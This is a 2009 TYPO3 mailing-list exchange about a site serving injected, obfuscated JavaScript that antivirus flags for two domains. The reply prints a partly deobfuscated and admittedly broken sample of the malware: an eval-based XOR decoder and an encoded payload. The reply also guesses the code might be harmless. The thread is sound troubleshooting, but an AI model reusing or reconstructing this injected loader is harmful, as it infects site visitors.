[TYPO3-english] virus/worm on Typo3 installation.

[bernd wilke]

Am Mon, 12 Jan 2009 11:56:00 +0100 schrieb Asbjørn Morell:

> Hi,
> 
> When I open my homepage Avast antivirus gives me a warning:
> 
> Access blocked to:
> whitebiz.vn
> wertionase.com
> 
> I looked at the html source and there is some encrypted javascript at
> the bottom. (see below) This can't be good. I tried replacing the Typo3
> dir with a fresh source and cleared backend and frontend case. Any ideas
> wgere this is coming from? The webserver is hosted at servage.com
> 
> Best regards.
> Asbjørn Morell.
> 
> </body>
> 
> </html><!-- ad --><script>
[...]
> </script><!-- /ad -->

not good? 

this kind of encryption is a common way to secure a piece of javascript-
code against modification or insight. But normaly you can work it out 
step by step. (use the cpu inside your head, which is better than any 
from silicone)

this might be done by javascript-libraries, or your hoster (especially 
free-webspace often includes some commercials in a way you can't remove 
it) 

either this is included in your index.php 
or this might be inserted after your PHP-Script is run and may be 
included in every (HTML-)file on your server by 1) apache 2) proxy 3) ...

try to generate a simple HTML/PHP-file in a separate directory beside 
fileadmin and look what you get if call you these files in your 
webbrowser.





trying to uncrypt your code I got 'til:


window['eval'] ( window['eval'] (
function Alha(AID){
    function ADA(LAHah){
        eval("var PaTLHaH=0;");
        var ApTl=LAHah.length;
        eval("var AIhpGl=0;");
        while(AIhpGl< (AID.length); HGa++){
            var HTA=AhlTH(ApHlhD,ATlAH)^AhlTH(AaTP,HHIl);
            var PhaAaHP=AhlTH(AID,HGa);
            ATlAH++;
            HHIl++;
            if(HHIl>AaTP.length)
                HHIl=0;
            if(ATlAH>ApHlhD.length)
                ATlAH=0;
            AGATI+=String.fromCharCode(PhaAaHP^HTA) + '';
        }
        eval(AGATI);
        return AGATI=null;
    }
    catch(e){}
}
Alha('%32%38%36%38%36%37%33%32%61%16%00%16%3d%36%5b%3c%6e%4e%2a%38%2d%2e%
78%0d%01%12%3e%53%1f%6a%34%3c%22%27%33%13%3d%3e%48%3a%10%1e%1a%27%2d%47%
22%32%27%12%29%13%76%6b%1a%16%25%31%75%3e%71%75%5c%66%3f%7d%3d%25%38%78%
74%1a%07%05%2e%72%5e%74%6f%2a%1b%30%21%27%57%1c%31%6c%16%03%07%3c%0d%3a%
48%3e%13%13%24%74%4b%57%3f%74%10%1e%0a%00%0e%2d%2c%7d%15%0b%2f%27%6f%79%0e
%2f%08%2e%1e%5d%76%50%45%7d%7f%7d%2d%6c%32%39%24%12%18%0e%02%3e%1d%20%33%
0b%79%6b%39%25%39%1b%3e%3c%3b%08%10%3f%22%70%6b%3f%4e%7d%4d%59%15%51%37%
37%33%06%06%28%06%33%32%22%33%78%79%4f%3b%2f%1c%30%3a%26%55%6a%6c%56%55%4c
%54%15%2c%22%3e%1b%36%24%0a%7a%38%11%27%02%4b%25%29%2a%3c%02%21%2a%3d%3b%
2b%25%73%00%7a%5b%7d%27%17%2a%3f%2c%7e%67%31%40%28%24%3b%1b%0e%39%3e%3a%
39%15%5a%68%3b%33%3a%34%20%3f%24%06%45%42%45%24%52%4b%33%31%08%4e%5a%6b%
30%6d%4d%1a%72%61%48%38%2a%59%45%03%22%22%64%23%09%3a%1d%76%43%74%6c');
)

then I get syntax-errors with the function Alha(). maybe the output of 
this function may give a hint.

or you use some browser-extensions to view the generated source :-/
!!! this may execute a possible virus !!!


bernd
-- 
http://www.pi-phi.de/t3v4/cheatsheet.html